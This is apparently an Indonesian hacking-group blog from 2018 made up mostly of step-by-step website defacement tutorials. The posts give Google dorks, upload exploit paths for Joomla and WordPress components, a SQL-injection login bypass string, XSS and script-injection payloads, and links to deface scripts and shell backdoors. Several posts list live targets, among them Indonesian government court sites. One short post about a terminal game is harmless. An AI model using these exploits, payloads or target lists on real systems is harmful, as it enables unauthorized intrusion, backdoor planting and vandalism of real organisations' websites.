Selasa, 25 September 2018

Deface Poc Com Media

Deface Poc Com Media
Live Target


Assalamualaikum wr.wb!1!1
Met Pagi semua... Mumpung gw lagi nganggur and kgk ada kerjaan mending gw post cara deface poc com media:V".. Biar makin hots gw akan kasih live target dengan site go.id ;(*... Simak aja lngsng : 

~ Dork :
Inurl:com_media site:.com
~ Exploit :
/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
- Script Deface bentuk TXT

Live target :

Pertama Kita dork dulu gan kek biasanya:*(...


Kedua masukkan exploit dibelakang websitenya.. Contoh : http://pt-palangkaraya.go.id/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=... Nanti akan tempat buat upload file kita:)*..


Ketiga isi sembarang pertanyaannya.. trs upload file kita Ingat formatnya harus TXT...  Kemudian pencet unggah sekarang:(*..


Kalau sudah teruggah cara liatnya tinggal tambahin /images/namafilenya.txt dibelakang websitenya contoh : http://pt-palangkaraya.go.id/images/ws.txt


Kwkwkwkwkwkwkkw done ea:(*.. Meskipun txt yg penting go.id :V"..
See you next post!1!1..
Share:

Script Deface Keren + Mantap

Script Deface Keren
Part I

Yooo... Gw mau bagi bagiin sc gw.. Yah emng kgk semuanya gw buat sndiri :V".. Sebagian juga ada yg recode:(*.. Tpi gw dah ijin ditambah gw recodenya bkn kyk lu anjer yg cmn ganti nick doank :V".. Lngsng Ajalah :

1. Script Deface Ruwet


Yahh emng agak pasaran sih scriptnya tpi keren kan?? Minat lngsng ambil Disini gan..

2. Script Deface Zeroxploit


Sc ini gw dikasih anak dari member team zeroxploit:(*.. Minat? Ambil Disini.

3. Script Deface GHI


Script Favorit gw pas gw masih member ghost Hunter Illusion:V".. Minat? Ambil Disini..

4. Script Deface Idul Adha


Ini baru gw buat sndiri dibantu ama anak" W3LL SQUAD:)*.. Minat ? Ambil Disini..

5. Script Deface Nyindir


Ini baru script yg paling mantap;(*.. 1 bln baru kelar:D.. Soalnya masukin huruf arabnya susah;V".. Minat? Ambil Disini..


Udh dulu lahh;(*.. Ntar Part 2 nya nyusul Ok:V"... Thanks You 
Share:

Senin, 24 September 2018

Cara Deface Dengan Xss Vulnerability

Cara Deface Dengan Metode
XSS Vulnerability

Mngkin metode ini metode yg cukup jadul dan jarang digunakan oleh anak anak defacer.. Tpi jangan salah paham kalaw yg make pandai XSS bisa lebih mematikan ketimbang SQL karna Akibat serangan ini penyerang dapat mem-bypass keamanan di sisi klien, mendapatkan informasi sensitif, atau menyimpan aplikasi berbahaya... Ok langsng aja :


1. Masukan dork digoogle
 ( inurl:"/showcatrows.php?CategoryID=" )


2. Akan Muncul Web Bnyak Silahkan Pilih satu:V"...


3. Jika Sudah Masuk Ke webnya Tambahkan "><marquee><h1>Hacked+By+FALKA+-+W3LL_SQUAD<%2Fh1><%2Fmarquee> di belakang Websitenya..
Contoh :
https://scriptreseller.com/showcatrows.php?CategoryID=5"><marquee><h1>Hacked+By+FALKA+-+W3LL_SQUAD<%2Fh1><%2Fmarquee>

4. Sukses Kode Yg html yg anda tulis tadi sudah ada diwebsite tersebut:V"...


Mudahkan?? Soalnya ini XSS level dasar:(*... Cocok buat kalian yg pengen belajar deface:V"... 
Okok Thanks Moga Bermaanfaat:)*..




Share:

Deface Tebas Index Com_Fabrik

Deface Tebas Index Com Fabrik +
Live Target


Kmrin ada yg nanya - nanya digrup" apa bisa tebas index com fabrik? Ada yg bilang bisa tapi harus diext dulu shellnya .. Ada yg bilang gk bisa juga:V"... Daripada bingung gw akan jelasin aja skrng.. Intinya mah bisa OK!1!1

Pertama kalian siapkan bahannya :
- Dork 
( Index php option com_fabrik site:.all site )
- Exploit 
( index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload )
- htacces Pencet sini
- Csrf Pencet disini
- Script Deface

Live Target :
http://www.pn-pinrang.go.id/new
http://www.pn-bantaeng.go.id/new

Dork digoogle kyk biasanya .. Pilih target trs masukan exploit :(*..


Kalaw vuln ada tulisannya {"filepath":null,"uri":null}..


Kemudian tinggal masukan link targetnya ke csrfnya terus simpen..


Kemudian buka digoogle atau browser lainnya :(...


Ingat pertama upload htaccesnya dulu ..




Setelah htaccesnya diupload kalian kembali.. lalu kalian upload script deface kalian atau shell backdorr kalian..


Kalaw gw lngng upload sc aja biar gk kelamaan dan bumm dijamin website com fabriknya sudah ketebas.. 


Lumayan susah?? Yah jelass gw aja baru bisa setelah beberapa hari bljr;(*.. Kalaw bingung hubungi wa gw aja di nomer 083831973261
Next see you in new post:V""...
Share:

Minggu, 23 September 2018

Deface Bypass New Dork

Deface Poc Bypass Admin
2018


Hmmm gw mao kasih tutor deface bypass admin dengan new dork :V"".. Sebenernya Gw lagi sad soalnya laptop gw baru masuk rumah sakit:V".. Tpi gimana lagi semuanya udh pada minta tutor + dork bypassnya:(*.. Ydh lngng aja deh.. Bumbunya :

- Hp/Pc
- Dork
- Shell Backdoor
- Script deface


Pertama kita dork dulu ... Dorknya :
-inurl;/admin site:.in
-inurl:/panel/login.html
-inurl:/admin/login.html
-inurl:/administrator/login.html
-inurl:/adminpanel/login.html
-inurl:/login/login.html


Kedua pilih salah satu webnya:(*.. Ntar kalian Ntar pasti disuruh masukin username dan passnya kalian isi keduanya dengan '=''or' ... 


Kalau Vuln Kalian Akan masuk ke dashboard adminnya.. 


Ketiga kalian cari tempat buat upload file shell atau sc deface kalian :V"..


Keempat upload file kalian:)*.. Kalaw sudah diupload gambarnya rusak.. Dan  cara liatnya tinggal lu teken lama gambarnya trs open image in new tab.. Dan Bowwlalallala website sudah terdeface:V""...




Kelar Deh Deface dengan poc bypassnya:V".. Jan Lupa Share Dan Koment yaa(*...
Share:

Sabtu, 22 September 2018

Deface Poc Wp-Content Uploadify

Deface Poc Wp-Content
Uploadify


Met pagi minna!1!1... Sebenernya gw udh lama mau kasih tutoral deface dengan metode uploadify.. Tpi gw mesti lupa anjer.. Skrng gw ingat ydh lngng share blog:V... Simak aja lngsng ...


- Dork nya :
inurl:"/wp-content/themes/qualifire"(dorking di gugel images)
- Exploit :
/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php (Kalo blank vuln)
- Csrf Sentuh Sini

Live Target : http://proeletricaengenharia.com.br

Pertama Kita Dork Dulu Digoogle images.. Cari Target Trs Masukan exploit law blank putih berati vuln:V.. Law enggk blank tinggalkan:(*..


Berhubung Gw dah ada live target gw langsng eksekusi aja:V .. 
Masukan Target Ke Csrfnya



Simpan file Csrfnya Dngn format html kemudian buka di browser kesayangan anda:V"....

Kemudian upload script atau shell kalian terserah:V".. 
Cara liat hasilnya : http://proeletricaengenharia.com.br/file_Kalian.html


Mpssssh :V"... Dah selesai.. Jangan lupa share dan koment minna!1!1
Share:

Senin, 17 September 2018

Apk Buatan W3LL SQUAD

Aplikasi Tutorial Buatan 
W3LL SQUAD 


Gw Akan Kasih Aplikasi Codingan Team W3LL SQUAD Sendiri... 
Didalam Apknya Sendiri Udh Tersedia Berbagai Macam Tutorial Sekaligus Videonya Yg Pasti Mempermudah Lu Buat Bljr Bljr Tentang Seputar Dunia Hacking... 

Langsng Aja Chmod Disini

Penampakan Apknya Liat Dibawah :





Mantapp Bukan:v... Tutorial + Video Jadi Satu Dijamin Lu Cepet Pandai;v... Hwhwhwhwhwhwhwh

Share:

Sabtu, 15 September 2018

Deface Webdav With Apk W3LL SQUAD

Cara Deface Webdav
Menggunakan Apk Buatan 
W3LL SQUAD


Yaaaa Kali Gw Akan Ngasih Tutorial Deface Poc Webdav.. 
Sebenarnya Deface Poc Webdav Bisa dilakukan ditermux .. Bisa juga dipc dengan apk rootkit buatan hmei7...
Tapi Keduanya sama" ribet:v... Lebih Baik Menggunakan apk buatan W3LL SQUAD yg skrng lagi buming... 

Langsng aja

Pertama kalian harus punya apknya Download Disini um 

Kedua Kalian Harus Punya Script Deface.. Kalaw blm punya silahkan liat" beranda blog gw disana ada script deface yg mngkin cocok buat kalian..

Cara defacenya liat dibawah

1. Buka Apk Webdavnya


2. Isi Seperti Gw ... Liat gambar dibawah ini


NB: Taruh Script Deface Di penyimpanan perangkat gk ush pke folder.. 

3. Upload deh.. Law sukses kyk gini penampakannya 


4. Terakhir tinggal kita cek hasilnya


Hwhwhwhwhw done kan?:v... Jangan lupa Share Dan koment:v... 

Mumpung gw baik gw kasih webdav vuln aja sekalian biar makin gud..


Live Target :
  1. http://classe74.ch
  2. http://tankertech.co.za
  3. http://open.forms.fi
  4. http://tieronecapital.co.za
  5. http://tcmgroup.co.za
Share:

Main Game DiTermux

Cara Bermain 
Moon-Boogy Via Termux



Malem Minna;v.. Bagi kalian yg jones disetiap malming kuylah coba maen game moon-buggy via termux.. Gamenya sih agak susah tapi gud:v.. Ok langsng aja 

Pertama kalian harus punya apk termux.. Kalian bisa mendownload diplaystore kalian masing"..

Kedua masukan perintah :
$pkg install moon-buggy
Ketiga masukan perintah :
$moon-buggy

Nahh Seperti dibawah penampakan gamenya;v



Ok Jangan Lupa coment dan Share Minna:(*..
Share:

Senin, 10 September 2018

Deface Metode JSO

Tutorial Deface
Menutup Halaman Depan Situs Target dengan JS Overlay

Image result for gambar violet evergarden hd


Hai hai sebenernya gw bingung mau post apa;v,,, Tpi berhubung bnyk yg blm paham deface dengan metode JSO,, Ydh w kasih tutorialnya aja,, JSO ada dua gan ada yg bukutamu.html sama ada yang hubungi.php,, Kali ini gw kasih tutor yg hubungi.php,, OK lngng aja simak 

Bahan Bahannya :
- Laptop/Android
- Kouta Internet Ya jelas lah Cukk;v,,,
- Dork :
 inurl://hubungi.php
- Script Jso
 <script type="text/javascript" src="https://pastebin.com/raw/KbrVekQG"</script>

Bagi yg blm punya bisa buat sc JSO,, Bisa buat Disini

1. Kita Dork Dulu digoogle kawan;v,


2. Pilih Target Sesuka kalian,,
3. Isi nama Dan Email Sesuka kalian,, Trs Bagian Pesan Masukan Sc JSOnya


4. Tinggal Kirim Pesan Deh,,, Dan Cara Manggil Hasil Depesannya Adalah Tambahan admin/hubungi.php Dibelakang Sitenya


Ok Mudah Bukan?;v,,, Kuylah Cepet Dipraktekan Supaya Cepet Pandai,, 
hwhwhwwhwhwhhwhw,,
Share: